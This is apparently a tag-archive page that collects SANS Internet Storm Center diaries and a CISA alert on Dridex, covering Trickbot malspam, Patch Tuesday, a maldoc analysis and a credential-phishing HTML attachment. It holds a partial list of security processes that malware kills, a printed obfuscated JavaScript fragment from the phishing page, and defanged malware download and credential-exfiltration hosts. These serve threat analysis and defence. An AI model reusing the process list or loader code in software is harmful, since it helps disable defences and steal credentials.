Tag Archives: Security

Analyst Webcast: Protecting the User: A Review of Mimecasts Web Security Service – December 12, 2019 1:00pm US/Eastern

This post was originally published on this site

Speakers: David Szili

The web remains a primary vector for cyberattacks, as either the initiation point or the way to complete an adversary’s mission. Unsuspecting employees remain in the firing line despite security awareness training and increasingly intelligent security controls. In this webcast, SANS instructor David Szili will discuss his perspectives on best practices for securing the web in general and his experience using the Mimecast Web Security cloud service in particular.

David will discuss using the Mimecast Web Security service to set policies to identify and block dangerous sites and manage which employees can access which sites as part of an acceptable use program. He will also walk attendees through the built-in reporting capabilities, dashboards, and best practices for setting up and using the service. Attendees will also learn how the web security tools are integrated with the Mimecast Secure Email Gateway with Targeted Threat Protection for simplified setup and the most effective way to manage and block malware and other threats using a single cloud platform.

Register for this webcast and be among the first to receive the associated whitepaper written by SANS instructor David Szili.

Code & Data Reuse in the Malware Ecosystem, (Thu, Dec 12th)

This post was originally published on this site

In the past, I already had the opportunity to give some “security awareness” sessions to developers. One topic that was always debated is the reuse of existing code. Indeed, for a developer, it’s tempting to not reinvent the wheel when somebody already wrote a piece of code that achieves the expected results. From a gain of time perspective, it’s a win for the developers who can focus on other code. Of course, this can have side effects and introduce bugs, backdoors, etc… but it’s not today’s topic. Malware developers are also developers and have the same behavior. Code reuse has been already discussed several times[1]. For example, tools exist to detect cloned or reused code in the IDA disassembler[2][3].

A Trendmicro report demonstrated that different malware families (URSNIF, EMOTET, DRIDEX, and BitPaymer) have code similarities[4].

But, code or data reuse is present everywhere, even in simple macro languages. Yesterday, I found an interesting sample that contained a function to kill AV and other security products. To achieve this, the best approach is to have a list of potential process names, search for them and try to kill the process:

a2adguard.exe
a2adwizard.exe
a2antidialer.exe
a2cfg.exe
a2cmd.exe
a2free.exe
a2guard.exe
a2hijackfree.exe
a2scan.exe
a2service.exe
a2start.exe
a2sys.exe
a2upd.exe
aavgapi.exe
aawservice.exe
aawtray.exe
ad-aware.exe
ad-watch.exe
[...]

The complete list contained 233 items! On Twitter, one of my followers pointed me to a GitHub page that had a file containing exactly… 233 items! I searched for more references and found other ones which also contained the same list:

  • Reverse Shell Backdoor framework[5]
  • Dr0p1t framework[6]
  • Metasploit[7]

Why malware developers should take time to compile their own list of interesting processes while such lists are already publicly available? If you have written some code or compiled data like those and published them somewhere (for any valid reason – nothing malicious), they’re chances that they will be found and (ab)used by attackers in their code!  The best example is Mimikatz that has been (and is still) used in many attacks. This is valid not only for pieces of code but also for any “data”. Keep this in mind!

[1] https://www.first.org/resources/papers/london2019/1630-Code-Reuse-Analysis-Holtzman-.pdf
[2] https://github.com/BinSigma/BinClone
[3] https://www.hex-rays.com/products/ida/tech/flirt/in_depth.shtml
[4] https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/
[5] https://github.com/tarcisio-marinho/RSB-Framework/blob/master/Python/victim/av.txt
[6] https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/resources/killav.py
[7] https://github.com/rapid7/metasploit-framework/blob/master/scripts/meterpreter/getcountermeasure.rb

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

German language malspam pushes yet another wave of Trickbot, (Wed, Dec 11th)

This post was originally published on this site

Introduction

On Tuesday 2019-12-10, artifacts found through VirusTotal reveal a wave of German language emails pushed Trickbot.  Today’s diary reviews information from this specific channel of Trickbot distribution.

The malspam

I only found one example of the malicious spam (malspam) in VirusTotal as shown below.


Shown above:  An example of German malspam pushing Trickbot.


Shown above:  An example of the Word documents from this malspam.

Infection traffic

Infection traffic is typical for what I’ve seen with Trickbot for the past several months.


Shown above:  Traffic from the infection filtered in Wireshark.


Shown above:  HTTP traffic to retrieve a Windows executable for Trickbot.


Shown above:  Traffic from later during the infection, filtered in Wireshark.


Shown above:  HTTP traffic caused by Trickbot’s password grabber module.

Forensics on an infected Windows host

See the images below covering artifacts found during forensics on a Windows host infected with this sample of Trickbot.


Shown above:  Artifacts dropped on a Windows host after enabling macros on the Word document.


Shown above:  Trickbot installed on an infected Windows host.


Shown above:  Scheduled task to keep Trickbot persistent on an infected Windows host.

Indicators of Compromise (IoC)

File names for 17 of the Word docs found on VirusTotal:

  • diebewerbung391.doc
  • diebewerbung393.doc
  • diebewerbung423.doc
  • diebewerbung447.doc
  • diebewerbung457.doc
  • diebewerbung467.doc
  • diebewerbung469.doc
  • diebewerbung487.doc
  • Mietvertrag370.doc
  • Mietvertrag404.doc
  • Mietvertrag406.doc
  • Mietvertrag416.doc
  • Mietvertrag424.doc
  • Mietvertrag440.doc
  • Mietvertrag446.doc
  • Mietvertrag454.doc
  • Mietvertrag458.doc

SHA256 hashes for 17 of the Word docs found on VirusTotal:

  • 01968f30b665f54b1b403dec93184cc75772c3727b96e32dd76926b90926115c
  • 08852de6bdf8c609a9df42c985135cba2ac4e613295a9fbdcabc78717b39d345
  • 19abd94a36f94f203a4c137d38c41d5affb9b6ca51440927644f64877d2d6fdd
  • 3390b7f9d7addaa79a5e700525d3608bce841defece1abd746cc20aca31f29ce
  • 342df0eea6961b16e84b7055f920932fa7b950a911a85cf622880dbf8c180abd
  • 3c26a38189416085d386c4d4c2c930add1f318b9fe62215742fa0b4c89112365
  • 4929295c2a0e668109ae6255e516f37348d183a9efc6c33a96a3f48d477be6a7
  • 4bb2bce3c63454db676fcef2ac9faafdf088b78376877ed98de700d1ee9f25f9
  • 5957871ecf9a5a0d1dc35f428ed012ed75749861ef50e2407190f5602601bedc
  • 9c26146a6d922670975c68c67de89c39da10552f0bd12b1147f59d539092dcf8
  • 9e5be910981c5521cc551b1e6a967e6e88a4b85540abd2cbf38698bcedee00a6
  • a2542f5890994081acf477727b67defa06153383837bb23a6b5581d347f1459c
  • d123dc5fa735b737e028598979f9e289dd1663f00041ddbc37bb9ba6ef02446f
  • d3c83590df348811aacd3a92cb1282b1df29438be08723a5e6c98b1ed1fe78e2
  • e544449c77868b62904184d7ea9f90abe4bff773f3f648f51e42ab4d3754bcd0
  • e5b4f3760e0a2ae92dc0e946d473e4fa2c7d198712580ddb19ef1c18e8b99d11
  • f3f1a36dbc2731fbb043941867988011f186b127745f7f6c27a7ad8319964b0c

SHA256 hashes for the downloaded Trickbot executable file:

  • 138f012ce2a236be4d983f1b621efc5a968a6ea37927c49b37fe39e70bc80d29
  • 817c7003b9f1d3b6b576422d5ff04ec9aa662d602b74b26a4fb03e6483d0ab6e

Infection traffic:

  • 162.241.24[.]101 port 80 – www.tinystudiocollective[.]com – GET /meta/21.exe
  • port 80 – ipecho[.]net – GET /plain
  • port 443 – ipecho[.]net – HTTPS traffic
  • 170.238.117[.]187 port 8082 – 170.238.117[.]187 – POST /mango21/[string of characters]
  • 131.161.253[.]190 port 449 – HTTPS/SSL/TLS traffic caused by Trickbot
  • 181.129.104[.]139 port 449 – HTTPS/SSL/TLS traffic caused by Trickbot
  • 185.14.28[.]107 port 447 – HTTPS/SSL/TLS traffic caused by Trickbot
  • 190.214.13[.]2 port 449 – HTTPS/SSL/TLS traffic caused by Trickbot
  • 195.123.245[.]127 port 443 – HTTPS/SSL/TLS traffic caused by Trickbot
  • 23.202.231[.]166 port 448 – Attempted TCP connections, but no response from the server
  • 23.217.138[.]107 port 448 – Attempted TCP connections, but no response from the server

Final words

Trickbot executable files are tagged with a marker that identifies the specific campaign used to distribute it.  The tag (usually referred to as “gtag”) is shown in URLs generated by Trickbot’s password grabber module, which caused HTTP traffic over TCP port 8082.  The gtag for this infection was mango21.

A pcap of the infection traffic, some associated malware, and an example of the malspam can be found here.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Microsoft December 2019 Patch Tuesday, (Tue, Dec 10th)

This post was originally published on this site

This month we got patches for 36 vulnerabilities total. From those, seven are rated critical and one is already being exploited according to Microsoft. 

The exploited vulnerability (CVE-2019-1458) may allow a local attacker to elevate privileges and run arbitrary code in kernel mode. This vulnerability was reported by Kaspersky Labs and, according to Zero Day Initiative  (ZDI) [1], Kaspersky also reported a UAF vulnerability in Google Chrome web browser [2] early November this year. When Chrome bug became public, there were speculations that it was being used in conjunction with a Windows Kernel bug to escape the sandbox. According to ZDI, while its not confirmed CVE-2019-1458 is connected to Chrome attacks, this is the type of bug that could be used to perform a sandbox escape. 

Amongst critical vulnerabilities, it worth mentioning CVE-2019-1471 a Windows Hyper-V Remote Code Execution Vulnerability. To exploit the vulnerability, an attacker could run a specially crafted application on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.

See Renato’s dashboard for a more detailed breakout: https://patchtuesdaydashboard.com

December 2019 Security Updates

Description

CVE

Disclosed

Exploited

Exploitability (old versions)

current version

Severity

CVSS Base (AVG)

CVSS Temporal (AVG)

Git for Visual Studio Remote Code Execution Vulnerability

%%cve:2019-1349%%

N

N

Critical

 

 

%%cve:2019-1350%%

N

N

Critical

 

 

%%cve:2019-1352%%

N

N

Critical

 

 

%%cve:2019-1354%%

N

N

Critical

 

 

%%cve:2019-1387%%

N

N

Critical

 

 

Git for Visual Studio Tampering Vulnerability

%%cve:2019-1351%%

N

N

Moderate

 

 

Latest Servicing Stack Updates

ADV990001

N

N

Critical

 

 

Microsoft Access Information Disclosure Vulnerability

%%cve:2019-1400%%

N

N

Important

 

 

%%cve:2019-1463%%

N

N

Important

 

 

Microsoft Authentication Library for Android Information Disclosure Vulnerability

%%cve:2019-1487%%

N

N

Important

 

 

Microsoft Defender Security Feature Bypass Vulnerability

%%cve:2019-1488%%

N

N

Important

3.3

3.0

Microsoft Excel Information Disclosure Vulnerability

%%cve:2019-1464%%

N

N

Important

 

 

Microsoft Guidance for cleaning up orphaned keys generated on vulnerable TPMs and used for Windows Hello for Business

ADV190026

N

N

 

 

Microsoft PowerPoint Remote Code Execution Vulnerability

%%cve:2019-1462%%

N

N

Important

 

 

Microsoft SQL Server Reporting Services XSS Vulnerability

%%cve:2019-1332%%

N

N

Important

 

 

Microsoft Word Denial of Service Vulnerability

%%cve:2019-1461%%

N

N

Less Likely

Less Likely

Important

 

 

Remote Desktop Protocol Information Disclosure Vulnerability

%%cve:2019-1489%%

N

N

Important

 

 

Skype for Business Server Spoofing Vulnerability

%%cve:2019-1490%%

N

N

Important

 

 

VBScript Remote Code Execution Vulnerability

%%cve:2019-1485%%

N

N

Important

7.5

6.7

Visual Studio Live Share Spoofing Vulnerability

%%cve:2019-1486%%

N

N

Important

 

 

Win32k Elevation of Privilege Vulnerability

%%cve:2019-1458%%

N

N

Important

7.8

7.2

Win32k Graphics Remote Code Execution Vulnerability

%%cve:2019-1468%%

N

N

Critical

8.4

7.6

Win32k Information Disclosure Vulnerability

%%cve:2019-1469%%

N

N

Important

5.5

5.0

Windows COM Server Elevation of Privilege Vulnerability

%%cve:2019-1478%%

N

N

Important

7.8

7.0

Windows Elevation of Privilege Vulnerability

%%cve:2019-1476%%

N

N

Important

7.8

7.0

%%cve:2019-1483%%

N

N

Important

7.8

7.0

Windows GDI Information Disclosure Vulnerability

%%cve:2019-1465%%

N

N

Important

5.5

5.0

%%cve:2019-1466%%

N

N

Important

5.5

5.0

%%cve:2019-1467%%

N

N

Important

5.5

5.0

Windows Hyper-V Information Disclosure Vulnerability

%%cve:2019-1470%%

N

N

Important

6.0

5.4

Windows Hyper-V Remote Code Execution Vulnerability

%%cve:2019-1471%%

N

N

Critical

8.2

7.4

Windows Kernel Information Disclosure Vulnerability

%%cve:2019-1472%%

N

N

Important

5.5

5.0

%%cve:2019-1474%%

N

N

Important

5.5

5.0

Windows Media Player Information Disclosure Vulnerability

%%cve:2019-1480%%

N

N

Important

5.5

5.0

%%cve:2019-1481%%

N

N

Important

5.5

5.0

Windows OLE Remote Code Execution Vulnerability

%%cve:2019-1484%%

N

N

Important

7.8

7.0

Windows Printer Service Elevation of Privilege Vulnerability

%%cve:2019-1477%%

N

N

Important

7.8

7.0

Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability

%%cve:2019-1453%%

N

N

Less Likely

Less Likely

Important

7.5

6.7

 

[1] https://www.zerodayinitiative.com/blog/2019/12/10/the-december-2019-security-update-review

[2] https://www.kaspersky.com/blog/google-chrome-zeroday-wizardopium/29126/


Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(Lazy) Sunday Maldoc Analysis, (Mon, Dec 9th)

This post was originally published on this site

I received another malicious Word document: with VBA macros and string obfuscation, launching a PowerShell downloader. As classic as they come.

The VBA code is not too long, and the obfuscation is not that hard. It makes a good example for static analysis.

I start the analysis with my tool oledump.py, this will give me an overview of the streams (including VBA macro streams) contained in the document:


Stream 8 has an M indicator: this stream contains VBA macros. Using option -s 8 to select stream 8, and option –vbadecompressskipattributes to decompress the VBA macros without showing the hidden attributes (usually I just use option -v, since I don’t mind seeing the hidden attributes), I get to see the VBA code:


There’s a Document_Open subroutine: this will be executed once the document is opened and the user has accepted the warning(s). It assigns a different number to three variables, and then calls function besb repeatedly with a number as argument.

These numbers are mostly different. Function besb takes the argument (a number), divides it by 23 and multiplies it with 1. Then it converts the obtained number to a character (chr function), and concatenates it into variable ahiv.
Finally, subroutine Document_Open executes (run) string ahiv.

With this information, I know that the numbers represent a command and that I can obtain that command by dividing each number by 23 and then converting it to a character. Typically, one would write a small custom script to do this, but as I often have to do such conversions, I made my own tool to help with this: numbers-to-string.py.

Numbers-to-string.py takes text as input, extracts the numbers it finds on each line (provided there are at least 3 numbers per line), transforms the numbers according to a given formula, and then converts them to a string.

I will use this to decode the command. First I select all VBA source code lines with function besb using grep. Since identifiers in VBA are not case-sensitive, I use option -i, just in case the malware author was not consistent in his case use for function name besb.


Next, I use numbers-to-string.py to process each number. Since by default, my tool expects 3 numbers per line, and here I have only one number per line, I use option -n 1 to have my tool process each line with 1 number or more.
Each number has to divided by 23: I use expression “n / 23” to achieve this. Here is the complete command:


When I read the characters from top to bottom, I see a command forming: powershell iex …

My final step is to use option -j to join all lines together:

Like I said: a classic example.

Yet, there is something unusual about this document. To be continued …

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Wireshark 3.0.7 Released, (Sun, Dec 8th)

This post was originally published on this site

Wireshark version 3.0.7 was released.

It has a vulnerability fix and bug fixes.

The vulnerability in the CMS dissector can be abused to cause a crash: %%cve:2019-19553%%

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Integrating Pi-hole Logs in ELK with Logstash, (Sat, Dec 7th)

This post was originally published on this site

I wanted to parse and ingest my Pi-hole DNS logs for a while now in Elasticsearch to be able to analyze them in various ways. I wrote four separate Grok parser for Logstash to send the logs to a ELK stack. I am now able to view and analyze which domains have been Sinkhole by gravity.list or regex.list (custom wildcard lists) and create the necessary dashboards to report on the DNS traffic. This is an example of the output in Discover. In this example, I have filtered out the dns_type: forwarded.


The configuration file can be downloaded here.

[1] https://pi-hole.net/
[2] https://handlers.sans.edu/gbruneau/elk/pihole.conf
[3] https://www.elastic.co/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Phishing with a self-contained credentials-stealing webpage, (Fri, Dec 6th)

This post was originally published on this site

Phishing e-mails which are used to steal credentials usually depend on user clicking a link which leads to a phishing website that looks like login page for some valid service. Not all credentials-stealing has to be done using a remote website, however.

I recently came across an interesting phishing campaign in which the scammers used a rather novel technique. The e-mail looked like a traditional payment notice phishing with a fairly usual text.

Good Day

Please find attached a copy of your payment notification

Kind Regards,
James Watson

The HTML attachment it carried, however, turned out to be anything but usual. When HTML attachments are used in a credentials-stealing phishing, the HTML code usually either redirects the browser to a fake login page, or it directly loads the fake login page from a source on the internet[1]. This HTML page turned out not to do either of those.

When I opened the 930 kB long file in a text editor, the only text visible at first glance was on the first line:

<!-- Internal Server Error -->

After it, there were 4735 empty lines followed by a lot of obfuscated JavaScript along with several legitimate and only Base64-encoded JavaScript libraries (e.g. jQuery, Bootstrap,…). Here is a small sample of the obfuscated JavaScript.

function m600(src5){var xwjc,m7hv=Function,z120,mdid,zf2p="NFj:otBH"z]%*,Zv0k4?XEdR9;1JQeIgK&!_yc{iDx) 3up7}w|WS6nr#~s/$nm(@=LVU2T[fPMhCb^r+-.Y8aOt'lq>AG5<",hcbn=zf2p.length,g6j7={cd:""},ue=new m7hv("ret"+"urn unesc"+"ape")(),djkh=new m7hv("x",ue("%74hi%73.c%64+=x")),pcjj=new m7hv("x","y",ue("%72et%75rn%20x.c%68ar%41t(%79)"));for(xwjc=0;xwjc<src5.length;xwjc++){mdid=pcjj(src5,xwjc);z120=zf2p.indexOf(mdid);if(z120>-1){z120-=(xwjc+1)%hcbn;if(z120<0){z120+=hcbn;}djkh.call(g6j7,pcjj(zf2p,z120));}else{djkh.call(g6j7,mdid);}}new m7hv(ue("%64oc%75me%6Et.w%72it%65(t%68is.%63d)%3Bth%69s.c%64=n%75ll")).call(g6j7);}m600("NbqL5wNGTxCxMzZ>pHxvXYJ.n-=PX;I%9NQgy? nCc)=Y$lOT?f+?~X/}OtdWFrA!P}#zOtgCdDFr{r+-.H,,Lq7Zd5d i)st>)1}mY1aQtI{/?Mrz~9.;*tYIXfXsrt[@ZJD(na-L!}qw_GlM/c>?C8F$8aOt''k"'s}fNl'R?oS-3TYzKMg-pIb.?KNOjn:~4?XEdR&NiW:5:"n}

Since the JavaScript was over 600k characters long (not counting the legitimate libraries), manual de-obfuscation and analysis of the code was not a realistic option. The next step, therefore, was to take a look at the website in a browser. After opening the file in Chrome in a VM, it became obvious why the script was so large. Unlike most other HTML-based phishing attachments, this one didn’t depend on an external fake login page, but carried the entire thing inside its body.

Although the page was supposed to look like a Microsoft site, the scammers provided a list multiple valid e-mail providers one could use to “log in”.

After a user supplies an e-mail and a password, the page appears to contact the relevant e-mail server.

In reality, however, it sends a HTTP GET request containing credentials specified by the user to a remote web server at hxxp://7l748.l748393.96.lt/.

Afterwards, an additional request for a phone number and a recovery e-mail is displayed to the user. When that is filled in as well (and sent to the same domain as before, although this time using a HTTP POST), the browser is redirected to a low-quality picture of the supposed invoice (at least I assume that is what it’s supposed to look like) and after a couple of seconds redirected again, this time to either a legitimate Microsoft site or to the domain specified in the recovery e-mail supplied by the user.

Sending user’s credentials to a server and then redirecting their browser to a legitimate site is a fairly common behavior for a phishing page. Although, to add insult to injury, in this case the phishing page not only steals the credentials but also transmits them over the network without any encryption in plain HTTP.

Besides that, the only unusual part of this phishing remains the fact the entire phishing page is delivered as an attachment. My suspicion is that this was intended to bypass security filters and analytics on web proxies (or provided by SafeLinks), but whatever the reason was, the idea is quite intriguing.

Although this isn’t the first phishing campaign with a similar “self-contained” website, this was the first time I came across such a complex HTML phishing attachment, i.e. one, that carried all the libraries and files in one package and didn’t depend on a remote server for anything else than for collecting the stolen credentials.

 

Invoice.html    
MD5 – 754860e44426eb50ff73597650d4d4b3
SHA1 – abb8536392fc6a721ae6f5ba7f377eaca3b4ae96    8bf20f30

———–
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AA19-339A: Dridex Malware

This post was originally published on this site

Original release date: December 5, 2019

Summary

This Alert is the result of recent collaboration between Department of the Treasury Financial Sector Cyber Information Group (CIG) and the Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN) to identify and share information with the financial services sector. Treasury and the Cybersecurity and Infrastructure Security Agency (CISA) are providing this report to inform the sector about the Dridex malware and variants. The report provides an overview of the malware, related activity, and a list of previously unreported indicators of compromise derived from information reported to FinCEN by private sector financial institutions. Because actors using Dridex malware and its derivatives continue to target the financial services sector, including financial institutions and customers, the techniques, tactics, and procedures contained in this report warrant renewed attention. Treasury and CISA encourage network security specialists to incorporate these indicators into existing Dridex-related network defense capabilities and planning.

This Alert does not introduce a new regulatory interpretation, nor impose any new requirements on regulated entities. Except where noted, there is no indication that the actual owner of the email address was involved in the suspicious or malicious activity. If activity related to these indicators of compromise is detected, please notify appropriate law enforcement and the CIG.

For a downloadable copy of IOCs, see:

Technical Details

The Dridex malware, and its various iterations, has the capability to impact confidentiality of customer data and availability of data and systems for business processes. According to industry reporting, the original version of Dridex first appeared in 2012, and by 2015 had become one of the most prevalent financial Trojans. We expect actors using Dridex malware and its derivatives to continue targeting the financial services sector, including both financial institutions and customers.

Dridex-related Phishing Attributes

Actors typically distribute Dridex malware through phishing e-mail spam campaigns. Phishing messages employ a combination of legitimate business names and domains, professional terminology, and language implying urgency to persuade victims to activate open attachments. Sender e-mail addresses can simulate individuals (name@domain.com), administrative (admin@domain.com, support@domain.com), or common “do not reply” local parts (noreply@domain.com). Subject and attachment titles can include typical terms such as “invoice”, “order”, “scan”, “receipt”, “debit note”, “itinerary”, and others.

The e-mail messages vary widely. The e-mail body may contain no text at all, except to include attachments with names that are strings of numbers, apparently relying on the subject line and victim curiosity to coerce the opening of the malicious file. Where there is a message body, the body may specifically state that the contents of the e-mail underwent virus scanning or simply directs the victim toward the link or attachment. In other cases, the body may include a long, substantive message, providing multiple points of contact and context for the malicious attachment. Attachment and hyperlink names vary from random sets of numbers or imitation automatic filenames from scanners to filenames purporting to reference financial records. Attachments may or may not have direct references using the same file name or strings of numbers in the bodies of the e-mails.

Example Links and Filenames (Note: link information is representative. Italicized statements are automatically generated by the cloud storage provider. # represents a random number.):

  • Link: HTTPS://WWW.GOOGLE[.]COM/URL?Q=HTTPS://WWW.(Cloud Services Provider)[.]COM/S/(Cloud Account Value) /RECENT%20WIRE%20PAYMENT %######.SCR?(Cloud Provided Sequence)
  • Link: HTTPS://WWW.GOOGLE[.]COM/URL?Q=HTTPS://WWW.(Cloud Services Provider) [.]COM/S/ Cloud Account Value/AUTOMATEDCLEARINGHOUSE%20 PAYMENT####.DOC? (Cloud Provided Sequence)

  • Link: Malicious File: ID201NLD0012192016.DOC

Attachments or eventual downloads can take a variety of formats. In some instances, malware downloaders are concealed in compressed files using the ZIP or RAR file formats.  Occasionally compressed files within compressed files (double zipped) are used. The compressed files can include extensible markup language (.xml), Microsoft Office (.doc, .xls), Visual Basic (.vbs), JavaScript (.jar), or portable document format (.pdf) files. Many of the files, rather than containing the actual malware, contain hidden or obfuscated macros. Upon activation, the macros reach to a command and control server, FTP server, or cloud storage site to download the actual Dridex malware. In other cases, macros launch scripts that extract executables imbedded in the document as opposed to downloading the payload.

By default, software generally prevents execution of macros without user permission. Attached files, particularly .doc and .xls files, contain instructions on how a user should enable content and specifically macros, effectively using social engineering to facilitate the download. Malicious files sometimes even include screenshots of the necessary actions to enable macros.

Malware Capabilities

Dridex malware operates from multiple modules that may be downloaded together or following the initial download of a “loader” module. Modules include provisions for capturing screenshots, acting as a virtual machine, or incorporating the victim machine into a botnet. Through its history and development, Dridex has used several exploits and methods for execution, including modification of directory files, using system recovery to escalate privileges, and modification of firewall rules to facilitate peer-to-peer communication for extraction of data. Recent versions of Dridex exploit vulnerability CVE-2017-0199, which allows remote execution of code. This vulnerability is specific to Microsoft Office and WordPad. Microsoft released a patch in 2017.

Once downloaded and active, Dridex has a wide range of capabilities, from downloading additional software to establishing a virtual network to deletion of files.  The primary threat to financial activity is the Dridex’s ability to infiltrate browsers, detect access to online banking applications and websites, and inject malware or keylogging software, via API hooking, to steal customer login information. Dridex modules package, encrypt, and transmit captured information, screenshots, etc., via peer-to-peer (P2P) networks in the XML format or in binary format, as seen in newer versions. After stealing the login data, the attackers have the potential to facilitate fraudulent automated clearing house (ACH) and wire transfers, open fraudulent accounts, and potentially adapt victim accounts for other scams involving business e-mail compromise or money mule activity.

The Dridex malware has evolved through several versions since its inception, partially to adapt to updated browsers. Although the characteristics described reflect some of the most recent configurations, actors continue to identify and exploit vulnerabilities in widely used software.

Dridex Malware and Variants

While Dridex is among the most prevalent sources of infection, previous variants and similar malware continue to represent a threat. Dridex is itself an improved variant of the Cridex and Bugat Trojans that preceded it, and it shares some of their codes. Although the previous variants’ theft activities operate in mostly the same way, the P2P communication aspects of Dridex improve its concealment and redundancy.

Ransomware

Actors distributing Dridex likely employ ransomware with similar configurations. Code for BitPaymer, also known as Friedex, includes numerous similarities to Dridex, despite its function as ransomware rather than data extraction. The two malwares use the same mechanics for several functions, and the authors compiled the codes at nearly the same time. The ransomware distributed through these malwares has targeted U.S. financial institutions and resulted in data and financial loss.
Locky ransomware operates using the same delivery method for the downloader, with similar subject lines and attachments. Attackers also use the same botnets to deliver both Dridex and Locky ransomware, sometimes simultaneously. Variants of Locky include Zepto and Osiris. Locky ransomware and its variants have a wide footprint, with varying impact depending on victim IT policies and practices and network configurations.

Dridex-related Activity

Although the highest infection rates took place in late 2015 and early 2016, concurrent with Locky ransomware distribution, Dridex continues to impact numerous countries. The Dridex hackers appear to direct the majority of attacks at English-speaking countries. Cybersecurity industry reporting attributes Dridex, BitPaymer, and Locky campaigns, as well as other massive malware spam (malspam) campaigns to actors known alternately as Evil Corp or TA505. (Note: some cybersecurity industry reporting simply refers to the actors as “Dridex” or the “Dridex hackers.”) Actors distribute the malware via massive spam campaigns, sending up to millions of messages per day, although volume of messages varies widely.

Indicators of Compromise

The following indicators are associated with the activity described in this report:

Indicator Type Indicator Value Associated Activity
Email address info[@]antonioscognamiglio[.]it Dridex
Email address info[@]golfprogroup[.]com Dridex
Email address cariola72[@]teletu[.]it Dridex
Email address faturamento[@]sudestecaminhoes[.]com.br Dridex
Email address info[@]melvale[.]co.uk Dridex
Email address fabianurquiza[@]correo.dalvear[.]com.ar Dridex
Email address web1587p16[@]mail.flw-buero[.]at Dridex
Email address bounce[@]bestvaluestore[.]org Dridex
Email address farid[@]abc-telecom[.]az Dridex
Email address bounce[@]bestvaluestore[.]org Dridex
Email address admin[@]sevpazarlama[.]com Dridex
Email address faturamento[@]sudestecaminhoes[.]com.br Dridex
Email address pranab[@]pdrassocs[.]com Dridex
Email address tom[@]blackburnpowerltd[.]co.uk Dridex
Email address yportocarrero[@]elevenca[.]com Dridex
Email address s.palani[@]itifsl.co[.]in Dridex
Email address faber[@]imaba[.]nl Dridex
Email address admin[@]belpay[.]by Dridex
IP address 62[.]149[.]158[.]252 Dridex
IP address 177[.]34[.]32[.]109 Dridex
IP address 2[.]138[.]111[.]86 Dridex
IP address 122[.]172[.]96[.]18 Dridex
IP address 69[.]93[.]243[.]5 Dridex
IP address 200[.]43[.]183[.]102 Dridex
IP address 79[.]124[.]76[.]30 Dridex
IP address 188[.]125[.]166[.]114 Dridex
IP address 37[.]59[.]52[.]64 Dridex
IP address 50[.]28[.]35[.]36 Dridex
IP address 154[.]70[.]39[.]158 Dridex
IP address 108[.]29[.]37[.]11 Dridex
IP address 65[.]112[.]218[.]2 Dridex

 

Mitigations

Treasury and CISA encourage users and organizations to:

  1. Contact law enforcement immediately report regarding any identified activity related to Dridex malware or its derivatives. Please see contact information for FBI and CISA at the end of this report.
  2. Incorporate the indicators of compromise identified in this report into intrusion detection systems and security alert systems to enable active blocking or reporting of suspected malicious activity. Note that the above list is not a comprehensive list of all indicators associated with this activity.
  3. Report suspicious activity, highlighting the presence of “Cyber Event Indicators.” Indicators of Compromise, such as suspicious e-mail addresses, file names, hashes, domains, and IP addresses, can be provided under Item 44 of the Suspicious Activity Report (SAR) form. FinCEN welcomes voluntary SAR filing in circumstances where reporting is not required.

Recommendations for All Organizations

The following mitigation recommendations respond directly to Dridex TTPs:

  • Ensuring systems are set by default to prevent execution of macros.
  • Inform and educate employees on the appearance of phishing messages, especially those used by the hackers for distribution of malware in the past.
  • Update intrusion detection and prevention systems frequently to ensure the latest variants of malware and downloaders are included.
  • Conduct regular backup of data, ensuring backups are protected from potential ransomware attack.
  • Exercise employees’ response to phishing messages and unauthorized intrusion.
  • If there is any doubt about message validity, call and confirm the message with the sender using a number or e-mail address already on file.
  • Treasury and CISA remind users and administrators to use the following best practices to strengthen the security posture of their organization’s systems:
  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and require regular password changes.
  • Exercise caution when opening email attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on workstations, and configure it to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).
  • Scan all software downloaded from the Internet before executing.
  • Maintain situational awareness of the latest threats.
  • Implement appropriate access control lists.
  • Exercise cybersecurity procedures and continuity of operations plans to enhance and maintain ability to respond during and following a cyber incident.

The National Institute of Standards and Technology (NIST) has published additional information on malware incident prevention and handling in their Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops:

Why Best Practices Matter

